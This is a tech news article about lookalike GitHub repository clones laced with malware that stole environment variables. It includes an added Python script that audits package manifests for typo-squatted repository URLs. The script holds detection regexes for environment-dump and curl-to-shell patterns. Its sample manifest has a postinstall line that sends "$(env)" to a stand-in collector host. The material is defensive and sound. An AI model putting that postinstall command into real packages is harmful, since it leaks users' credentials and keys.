
GitHub Repositories Weren’t Hacked

4 Aug 2022 10:33am, by

The good news is that tens of thousands of GitHub repositories were not hacked. I repeat, “Not hacked.” But many repositories have been cloned and then laced with poisonous malware content.

In this case, software programmer Stephen Lacy reported on Twitter that he’d found “What seems to be a massive widespread malware attack on @github.

  • Currently over 35k repositories are infected
  • So far found in projects including: crypto, golang, python, js, bash, docker, k8s
  • It is added to npm scripts, docker images and install docs”

Not as Bad as It Looked

After a closer look, however, it turned out it wasn’t nearly as bad as Lacy said. He himself admitted, “Correction, 35k+ ‘code hits’ on github, not infected repositories.”

And, of those, more than 13,000 malicious files came from a single repository, ‘Redhat-operator-ecosystem,’ which has since been removed.

Lacy also worked out that the original files had not been compromised or infected. Instead, they were cloned with names that sounded legitimate. This is an all-too-common attack vector. Always make sure that you use the exact, correct repos for your projects. Remember, you’re only one minor typo from a compromised project.

It also turned out that the major repositories, such as bash, crypto, docker, golang, python, and k8s, were left untouched. But don’t take that to mean you have nothing to worry about. As the JavaScript ‘colors.js’ and ‘faker.js’ fiasco showed, even small, obscure libraries, once sabotaged, can cause big damage.

As for this particular case, the malware-infected files both exfiltrated a user’s environment variables and contained a one-line backdoor. The former is bad enough: with it, an attacker could gain access to your API keys, credentials, and crypto keys. With the latter, an attacker can run arbitrary code on your systems. Just what you always needed, right?
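The two defensive points above, checking that a dependency really comes from the repository you meant rather than a lookalike clone, and spotting install-time scripts that ship your environment variables off to the network, can both be automated as a manifest audit. The script below is an added example written for this article, not code from Lacy, GitHub, or any of the projects mentioned; the allowlist, the regex heuristics, and the package.json-style manifest it scans are all constructed for illustration, and a pattern match means “review this,” not “this is malware.”

```python
"""Hypothetical audit of a package.json-style manifest (added example).

Two checks:
  1. git dependency URLs are compared against a pinned allowlist, and near
     misses (small edit distance) are reported as lookalikes;
  2. lifecycle scripts are matched against heuristics for environment
     exfiltration and remote-code-to-shell pipes.
"""
import json
import re

# Constructed allowlist: repositories this project is expected to pull from.
TRUSTED_REPOS = {
    "github.com/example-org/widgets",
    "github.com/example-org/auth-lib",
}

# Constructed heuristics for lifecycle scripts (postinstall, prepare, ...).
SUSPICIOUS_SCRIPT_PATTERNS = [
    (re.compile(r"\b(env|printenv)\b[^|;&]*\|\s*(curl|wget|nc)\b"),
     "environment dump piped to a network tool"),
    (re.compile(r"\b(curl|wget)\b[^;&]*\$\((env|printenv)\)"),
     "curl/wget sending environment output"),
    (re.compile(r"\b(curl|wget)\b[^;&]*\|\s*(sh|bash)\b"),
     "remote content piped straight into a shell"),
]


def normalize_repo(spec):
    """Reduce a git dependency spec to 'host/owner/name'; None if not a git URL."""
    s = spec.strip()
    if s.startswith("git+"):
        s = s[4:]
    if "://" in s:
        s = s.split("://", 1)[1]
    elif s.startswith("git@"):            # scp-style: git@host:owner/name.git
        s = s[4:].replace(":", "/", 1)
    else:
        return None                       # semver range or registry name
    if "@" in s.split("/", 1)[0]:         # drop user@ in front of the host
        s = s.split("@", 1)[1]
    s = s.rstrip("/")
    if s.endswith(".git"):
        s = s[:-4]
    return s.lower()


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_repo(spec, trusted=TRUSTED_REPOS, max_distance=2):
    """'trusted', 'lookalike:<trusted repo>', 'unknown', or None for non-git specs."""
    repo = normalize_repo(spec)
    if repo is None:
        return None
    if repo in trusted:
        return "trusted"
    if trusted:
        nearest = min(trusted, key=lambda t: levenshtein(repo, t))
        if levenshtein(repo, nearest) <= max_distance:
            return f"lookalike:{nearest}"
    return "unknown"


def scan_scripts(scripts):
    """Return (script name, reason) pairs for scripts that match a heuristic."""
    findings = []
    for name, command in scripts.items():
        for pattern, reason in SUSPICIOUS_SCRIPT_PATTERNS:
            if pattern.search(command):
                findings.append((name, reason))
    return findings


def audit_manifest(manifest):
    """Audit a parsed manifest; returns script findings and non-trusted git repos."""
    repo_findings = {}
    for section in ("dependencies", "devDependencies"):
        for name, spec in manifest.get(section, {}).items():
            verdict = classify_repo(spec)
            if verdict is not None and verdict != "trusted":
                repo_findings[name] = verdict
    return {"scripts": scan_scripts(manifest.get("scripts", {})),
            "repos": repo_findings}


# Constructed sample manifest: one lookalike repo URL and one exfiltrating script.
SAMPLE_MANIFEST = json.loads(r'''{
  "name": "demo-app",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -s https://collector.example.invalid/x -d \"$(env)\""
  },
  "dependencies": {
    "widgets": "git+https://github.com/examp1e-org/widgets.git",
    "auth-lib": "git@github.com:example-org/auth-lib.git",
    "left-pad": "^1.3.0"
  }
}''')

if __name__ == "__main__":
    print(json.dumps(audit_manifest(SAMPLE_MANIFEST), indent=2))
```

Run it as-is and it reports the `postinstall` script and the `widgets` dependency, whose URL is one character away from the allowlisted repository; `auth-lib` is accepted because it resolves to the same repository after normalization, and `left-pad` is skipped because a semver range is not a repository URL. The edit-distance threshold and the regexes are deliberately simple and will miss obfuscated scripts, so treat them as a first filter rather than a verdict.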

More Smoke Than Fire

Still, this was a case where there was more smoke than fire. As GitHub Security put it, after checking out the report:

  • No repositories were compromised
  • Malicious code was posted to cloned repositories, not the repositories themselves
  • The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts

So, it wasn’t a nothingburger, but it wasn’t really a big deal either.

The moral of the story is that while you should keep your eyes open for security problems, you shouldn’t treat every random report on the net of a new security concern as a disaster. Unfortunately, these days, with one security blowup after another, it’s understandable that we’re all a little bit nervous.

Featured image by Roman Synkevych 🇺🇦 on Unsplash.